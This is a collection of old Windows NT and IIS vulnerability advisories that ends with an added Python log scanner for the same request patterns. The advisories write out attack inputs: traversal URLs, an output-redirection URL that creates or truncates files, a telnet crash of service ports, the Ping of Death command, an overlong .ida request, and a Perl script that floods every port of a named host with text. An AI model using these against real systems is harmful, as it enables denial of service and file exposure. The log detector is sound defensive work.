Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple confused services can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings on the NTsecurity@iss.net list to test the ports on your own system (Perl is available from the NT Resource Kit):

/*begin poke code*/
use strict;
use warnings;
use IO::Socket::INET;   # replaces the Perl 4 "chat2.pl" library the original required

# Name of the system to test is the first command-line argument
my $systemname = shift @ARGV or die "usage: perl poke servername\n";

my $verbose    = 1;  # tell me what you're hitting
my $knownports = 1;  # don't hit known problem ports (53, 135, 1031)

# The original loop started at $0 (the script name), which is a bug; start at port 1
for (my $port = 1; $port < 65535; $port++) {
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    # Skip ports that refuse the connection instead of printing to an undefined handle
    my $fh = IO::Socket::INET->new(
        PeerAddr => $systemname, PeerPort => $port, Proto => 'tcp', Timeout => 2,
    ) or next;
    print $fh "This is about ten characters or more\n";
    if ($verbose) {
        print "Trying port: $port\n";
    }
    close($fh);
}
/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: 4.0

Using a telnet application to connect to a webserver via HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------
Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of result. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively a Denial of Service against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like 'The IDQ d:\http\anything.idq could not be found'. Such a response lets them learn more about how the web site is organized and the directory structure of the server.
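The request shapes described throughout this list (the '..\..' traversal, the '>' redirection and %0A%0D line breaks in /scripts, the "GET ../.." crash, the .ida/.idq path disclosure and the overlong '...ida' URL) are all visible in the web server log. The added example below, which is not from the original posting, classifies requests by those patterns; the log layout (date time c-ip method uri status) is a constructed simplification of the W3C extended format, and the hosts and dates are made up.

```python
import re
from urllib.parse import unquote

# Constructed sample log; the URIs mirror the advisory, the client addresses are invented.
SAMPLE_LOG = "\n".join([
    "1998-03-01 10:00:01 10.0.0.5 GET /default.htm 200",
    r"1998-03-01 10:00:02 10.0.0.7 GET /..\..\outside.txt 200",
    r"1998-03-01 10:00:03 10.0.0.7 GET /scripts..\..\scriptname 200",
    r"1998-03-01 10:00:04 10.0.0.9 GET /scripts/script_name%0A%0D>c:\target.bat 200",
    "1998-03-01 10:00:05 10.0.0.9 GET /anything.idq 404",
    "1998-03-01 10:00:06 10.0.0.11 GET /" + "." * 3000 + ".ida 500",
    "1998-03-01 10:00:07 10.0.0.5 GET /products/index.htm 200",
])

LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")

def classify_uri(uri, max_len=1024):
    """Return the set of advisory patterns a request URI matches (empty set if clean)."""
    decoded = unquote(uri)  # fold %0A%0D and %2E-style encodings before matching
    findings = set()
    if re.search(r"\.\.[\\/]", decoded) or decoded.endswith(".."):
        findings.add("traversal")   # /..\.. , /scripts..\..\x , ../..
    if "\r" in decoded or "\n" in decoded:
        findings.add("crlf")        # script_name%0A%0D
    if ">" in decoded:
        findings.add("redirect")    # exploit.bat>PATH\target.bat
    if re.search(r"\.id[aq](\?|$)", decoded, re.IGNORECASE):
        findings.add("ida_idq")     # anything.ida / anything.idq path disclosure probe
    if len(uri) > max_len:
        findings.add("overlong")    # the [25kb of '.']...ida crash request
    return findings

def scan_log(text):
    """Parse log lines; return [(client_ip, uri, sorted findings)] for flagged requests."""
    flagged = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                # skip lines that do not fit the expected layout
        ip, uri = m.group(3), m.group(5)
        findings = classify_uri(uri)
        if findings:
            flagged.append((ip, uri, sorted(findings)))
    return flagged

if __name__ == "__main__":
    for ip, uri, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, uri[:60])
```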